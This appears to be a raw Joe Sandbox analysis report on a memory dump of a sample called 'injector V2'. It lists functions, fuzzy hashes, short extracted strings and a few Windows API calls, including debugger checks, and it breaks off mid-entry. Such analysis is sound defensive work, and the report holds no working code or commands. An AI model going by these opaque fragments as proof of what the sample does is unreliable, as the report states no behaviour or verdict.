Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: $^t0$$^t0$$^t0$6Haz$6Haz$6Haz$=am#$>am#$>am#$>am#$kX]E$lX]E$lX]E$lX]E
API String ID: 0-4155389939
Opcode ID: 90166c8b574403ab5dbc3d77106dd02332e4b59f3c28ab764a19c7a4841d80b6
Instruction ID: f28344041a9f68d5fa22498c5d9443de6ceb4c22d51c9c62a51cac5c4870f5ce
Opcode Fuzzy Hash: 90166c8b574403ab5dbc3d77106dd02332e4b59f3c28ab764a19c7a4841d80b6
Instruction Fuzzy Hash: EBD23A36E152158B8F2C9A2CD5E117EB3D1DB54320B3506EEED23AB3E0CB32DD469691

Function 00B47840 Relevance: 17.1, Strings: 13, Instructions: 886COMMON

Download Yara Rule

Strings

1I#, xrefs: 00B47B90
WlUi, xrefs: 00B48361
U/, xrefs: 00B4854A
1I#, xrefs: 00B47BA2
U/, xrefs: 00B47D9E
1I#, xrefs: 00B47CC2
U/, xrefs: 00B48124
WlUi, xrefs: 00B47E21
1I#, xrefs: 00B4830E
WlUi, xrefs: 00B47B57
VlUi, xrefs: 00B480AD
WlUi, xrefs: 00B47B65
U/, xrefs: 00B4852D

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: VlUi$WlUi$WlUi$WlUi$WlUi$1I#$1I#$1I#$1I#$U/$U/$U/$U/
API String ID: 0-3233344364
Opcode ID: 7d9c895474c0423a3e128664574922b9dd8e4897013eb72fa4705b5557de1460
Instruction ID: 706946b3042eeaaf5c89fe4d09d534ee24ecbb63f458c933df2e1c3d99713a15
Opcode Fuzzy Hash: 7d9c895474c0423a3e128664574922b9dd8e4897013eb72fa4705b5557de1460
Instruction Fuzzy Hash: 40526F3664C7004F5A6CC62999C812E77D2DBA4320B248AD1EA26CF3F5FF60DF45E642

Function 00B3DD00 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 293COMMON

Download Yara Rule

Strings

eIY, xrefs: 00B3DD75
S@, xrefs: 00B3E3E3
string too long, xrefs: 00B3DE5A
eIY, xrefs: 00B3DDF8
eIY, xrefs: 00B3DD98

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: string too long$S@$eIY$eIY$eIY
API String ID: 0-2211027269
Opcode ID: 3a92852118e25de9ca059e9154b1e6d39ea07e4758f4c9a03d05b6ac093ea874
Instruction ID: 71ef1e07bdf05296278c4bce1f8ad97c67ddfe2932e0035b2085d1c06cd188bb
Opcode Fuzzy Hash: 3a92852118e25de9ca059e9154b1e6d39ea07e4758f4c9a03d05b6ac093ea874
Instruction Fuzzy Hash: 4A9149363042218B9E298A2CA9D523D3AD39BE0360F7D89D7E825DF7E4DB35CC458742

Function 00B35F60 Relevance: 9.0, Strings: 7, Instructions: 233COMMON

Download Yara Rule

Strings

9z`, xrefs: 00B362AB
C`lB, xrefs: 00B36000
9z`, xrefs: 00B3612A
C`lB, xrefs: 00B3604B
C`lB, xrefs: 00B36029
9z`, xrefs: 00B35FE8
9z`, xrefs: 00B3610C

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: C`lB$C`lB$C`lB$9z`$9z`$9z`$9z`
API String ID: 0-915920326
Opcode ID: 919b27690586ad3199399c051936a3231d5cbbdf850362b9072eb6b1a48dfaf7
Instruction ID: 2c549c36efc044b2d2fe7fa0d289a286d315f1b5fc0fd172a690d66ce0f81439
Opcode Fuzzy Hash: 919b27690586ad3199399c051936a3231d5cbbdf850362b9072eb6b1a48dfaf7
Instruction Fuzzy Hash: 3781F43A511B109BCA344B28598471E77D2AB90364F368BD6DD22EF7F0CB36DC468B81

Function 00B2A36B Relevance: 9.0, Strings: 7, Instructions: 230COMMON

Download Yara Rule

Strings

@\, xrefs: 00B2A377
A\, xrefs: 00B2B85B
"!-, xrefs: 00B2B880
A\, xrefs: 00B2A9AB
A\, xrefs: 00B2B86D
"!-, xrefs: 00B2B46D
"!-, xrefs: 00B2B872

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: @\$A\$A\$A\$"!-$"!-$"!-
API String ID: 0-1374745079
Opcode ID: 69ac5aa4550c41e1ba5c5d73d5566c1d209946ed39a2dc1cae421951b56c7645
Instruction ID: f7c5257fc0998ae67df1b368a24a50e81752cfacb1bea5835ec14fc8b69bdb22
Opcode Fuzzy Hash: 69ac5aa4550c41e1ba5c5d73d5566c1d209946ed39a2dc1cae421951b56c7645
Instruction Fuzzy Hash: 507107362047608B4D2C9A2879E953D63C3EBE6371B3986CFD91B8B6E4DF714C815A43

Function 00B3D4A0 Relevance: 8.1, Strings: 6, Instructions: 552COMMON

Download Yara Rule

Strings

$\Z, xrefs: 00B3D5B1
.'K`, xrefs: 00B3D634
$\Z, xrefs: 00B3DC63
.'K`, xrefs: 00B3D587
.'K`, xrefs: 00B3DAE6
-'K`, xrefs: 00B3D53B

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: -'K`$.'K`$.'K`$.'K`$$\Z$$\Z
API String ID: 0-1124325746
Opcode ID: bc79fa3c6b0df019b7fb551830d665087249714335e5df840ff1afbd2a5ed912
Instruction ID: f06505c316897102fbffc14ff019bc58fd962788a82c66e8064d5fc84aa0605d
Opcode Fuzzy Hash: bc79fa3c6b0df019b7fb551830d665087249714335e5df840ff1afbd2a5ed912
Instruction Fuzzy Hash: 74122F76A043108F8B284B2874D46BDB7E2EB55360F7A07DAE912E73E0DA25DD85C781

Function 00B33440 Relevance: 6.9, Strings: 5, Instructions: 687COMMON

Download Yara Rule

Strings

@B;, xrefs: 00B33BC6
@B;, xrefs: 00B33CD7
@B;, xrefs: 00B33CC9
?B;, xrefs: 00B334B2
@B;, xrefs: 00B334C8

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: ?B;$@B;$@B;$@B;$@B;
API String ID: 0-1209347523
Opcode ID: 94d72e2eb94082fb21df0caaffd0a05bee2b1eab2585fe4fdab0626c1cf3eaf6
Instruction ID: 981705177ae43eac6597735922e7296191ef055ef1ad491c6a5c98f798cb60ad
Opcode Fuzzy Hash: 94d72e2eb94082fb21df0caaffd0a05bee2b1eab2585fe4fdab0626c1cf3eaf6
Instruction Fuzzy Hash: B932073A7147005F4A28CA2899C456FB3E79BD8B34B358786E522CB7F4DB34DE86C641

Function 00B33F80 Relevance: 6.8, Strings: 5, Instructions: 572COMMON

Download Yara Rule

Strings

CyN, xrefs: 00B344AE
CyN, xrefs: 00B344A0
CyN, xrefs: 00B34128
CyN, xrefs: 00B3411A
CyN, xrefs: 00B34013

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: CyN$CyN$CyN$CyN$CyN
API String ID: 0-4075027903
Opcode ID: df6a7943b541e0bde5374bb44ada6ffe104fdf6ae21c714f5394701ef89ba81f
Instruction ID: 5bd58dca2d682be4c2be47dca8cc642a36103c55e9b894e82004a9341be50f03
Opcode Fuzzy Hash: df6a7943b541e0bde5374bb44ada6ffe104fdf6ae21c714f5394701ef89ba81f
Instruction Fuzzy Hash: 2812F73A6047004B4A28CB2E56C462E72D29BDA331F758BD6E512CB7F4DB29DD4BC742

Function 00B47330 Relevance: 6.6, Strings: 5, Instructions: 310COMMON

Download Yara Rule

Strings

c~N, xrefs: 00B475ED
b~N, xrefs: 00B473F0
c~N, xrefs: 00B473D6
c~N, xrefs: 00B475E2
c~N, xrefs: 00B47543

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: b~N$c~N$c~N$c~N$c~N
API String ID: 0-1905032987
Opcode ID: e6b4591400721c3c95bc73cfaa475e1206c99089188a1c4181b220de9a9d0da1
Instruction ID: b860ab4937dbb26c7307149c4699e7ab48ac46fd8a371983d54518367a7ad2c1
Opcode Fuzzy Hash: e6b4591400721c3c95bc73cfaa475e1206c99089188a1c4181b220de9a9d0da1
Instruction Fuzzy Hash: 2FA1FA7528C7404B4E288F6C55C422E73E6DBA8320B688AE6DD21CB2D4DF64DF45F646

Function 00B2B964 Relevance: 6.5, Strings: 5, Instructions: 235COMMON

Download Yara Rule

Strings

A\, xrefs: 00B2B85B
"!-, xrefs: 00B2B880
A\, xrefs: 00B2B86D
"!-, xrefs: 00B2B872
PbQ, xrefs: 00B2C1F9

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: A\$A\$PbQ$"!-$"!-
API String ID: 0-1954403065
Opcode ID: 67841456246173b1c413a1f682e6299e290322b4b7eff75176ed0f21b7518d93
Instruction ID: 86c2b3492af1b99e8ad048e9aff66426349be1ec6e6b931f70a044ce2236062e
Opcode Fuzzy Hash: 67841456246173b1c413a1f682e6299e290322b4b7eff75176ed0f21b7518d93
Instruction Fuzzy Hash: D271D2362047604B4E2C8A2879E453D22C3EFE6331B3986DBD91F9B6E8DA354C815A47

Function 00B4F731 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4F821

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 0ae6f514362f4626b441c296be7d10fb3397e6717d59fabab093f32f9d1e663b
Instruction ID: 26519f787e9162f85b47a5498e3652c7fc16b181adb8d4893e790f1473ee2040
Opcode Fuzzy Hash: 0ae6f514362f4626b441c296be7d10fb3397e6717d59fabab093f32f9d1e663b
Instruction Fuzzy Hash: F971C47190515AAFDF20AF38DC89BBABBF9EB05304F1441E9E449A7211DA358F85AF10

Function 00B496AF Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B496BB
IsDebuggerPresent.KERNEL32 ref: 00B49787
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B497A7
UnhandledExceptionFilter.KERNEL32(?), ref: 00B497B1

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
Instruction ID: ca03c3964246066d95ffd6abfea1d31a0c15c33ffc1fe09476ad374cbbd18999
Opcode Fuzzy Hash: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
Instruction Fuzzy Hash: 8C31E4B59453189BDB10EFA4D9897CDBBF8AF18300F1041EAE40DAB250EB719B859F45

Function 00B44CD0 Relevance: 4.8, APIs: 3, Instructions: 287COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00B44D66

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ___std_exception_destroy
String ID:
API String ID: 4194217158-0
Opcode ID: d1f2018f4cbf707ae15a2092ede6ff12df315ba00a63aed5c012fbbcf6d577df
Instruction ID: 78f63dc66f3ce5f10188f0bccfdd6f5f06ea3ff75bdcbb5fad9fc7ba040643b4
Opcode Fuzzy Hash: d1f2018f4cbf707ae15a2092ede6ff12df315ba00a63aed5c012fbbcf6d577df
Instruction Fuzzy Hash: 27913E3A6147004F5D28DE2869C532D73D29AA53317688EF2E922CB3E9DB24CF55E351

Function 00B4B79A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00B4B892
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B4B89C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00B4B8A9

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 3bd5582810baee16d8f22241fd5c50ebbe2ad62629a571158119ef7d92cc4cfd
Instruction ID: 8edcad0390d972f4f54210c8ed6aad2d6abee0fe3c46f67349142398d94a6b58
Opcode Fuzzy Hash: 3bd5582810baee16d8f22241fd5c50ebbe2ad62629a571158119ef7d92cc4cfd
Instruction Fuzzy Hash: E83192759013299BCB21DF68D989B8DBBF8EF18310F5041EAE41CA7290EB709F859F45

Function 00B41367 Relevance: 4.2, Strings: 3, Instructions: 413COMMON

Download Yara Rule

Strings

dUb, xrefs: 00B41730
dUb, xrefs: 00B41C9B
dUb, xrefs: 00B4172B

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: dUb$ dUb$ dUb
API String ID: 0-1696577624
Opcode ID: c99ae8837af4524e64abca57c619fc93d1b4092d6294c319d914a32cd4bface6
Instruction ID: 31599825eb04c8fb21ccf7a0dadf86fd38b69347395dc12731e487b281d858be
Opcode Fuzzy Hash: c99ae8837af4524e64abca57c619fc93d1b4092d6294c319d914a32cd4bface6
Instruction Fuzzy Hash: 82D15A3DD04308475A2CEF2C96C517D72D3D7D4370F284ADAD8264BBE4E6628FC9A646

Function 00B34CC0 Relevance: 4.2, Strings: 3, Instructions: 404COMMON

Download Yara Rule

Strings

Mnj, xrefs: 00B34F4F
Mnj, xrefs: 00B3519B
Mnj, xrefs: 00B34FEB

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: Mnj$Mnj$Mnj
API String ID: 0-3324928681
Opcode ID: 78bc169696fd6d201b59724774710c426360b8faa166af8e2b62c270681c7e1b
Instruction ID: 1f1de767dc7bf1a3e0750c4128b440b588de0039c66fb7460bcf03f5ec6494c5
Opcode Fuzzy Hash: 78bc169696fd6d201b59724774710c426360b8faa166af8e2b62c270681c7e1b
Instruction Fuzzy Hash: 1ED14C75205714CB993CC628E8C912D72D3EB98321F780FE6E467CB3A1DB29ED419653

Function 00B37F54 Relevance: 4.0, Strings: 3, Instructions: 243COMMON

Download Yara Rule

Strings

.Q_, xrefs: 00B38567
i.^, xrefs: 00B37DC0
j.^, xrefs: 00B37DCC

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: .Q_$i.^$j.^
API String ID: 0-3437208586
Opcode ID: c3492964beccc3518d56c428bc9a6d0ae9cd5c824e2224b1afb55c1831dd33bb
Instruction ID: 9d305f997e44cba9b02ac97b077cd1e02c5da8e75baf5a9c7424bddc9e4d9d30
Opcode Fuzzy Hash: c3492964beccc3518d56c428bc9a6d0ae9cd5c824e2224b1afb55c1831dd33bb
Instruction Fuzzy Hash: 988127752083018B9A3C96245CE463DF3C6EFA5361FB956D9F913DBAA0DE218D458383

Function 00B2D07E Relevance: 4.0, Strings: 3, Instructions: 203COMMON

Download Yara Rule

Strings

F- , xrefs: 00B2EE05
jiX, xrefs: 00B2D096
XvIL, xrefs: 00B2CDE8

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: F- $XvIL$jiX
API String ID: 0-1826392768
Opcode ID: 41ffabec1f88bd75c088f5dc72d15f01631fb4986d2928510cadcbfca815ff7f
Instruction ID: bfb470c0d9b2d7af71fd3bb0bab76bcfcb6ef9fb122c2a40f053b395bff50c89
Opcode Fuzzy Hash: 41ffabec1f88bd75c088f5dc72d15f01631fb4986d2928510cadcbfca815ff7f
Instruction Fuzzy Hash: 03619E316517255BAE2C9A28B8E963C7ED1DF54361B7542FEF41F57AF0CA20AC8086C2

Function 00B38129 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

i.^, xrefs: 00B37DC0
j.^, xrefs: 00B37DCC

Memory Dump Source

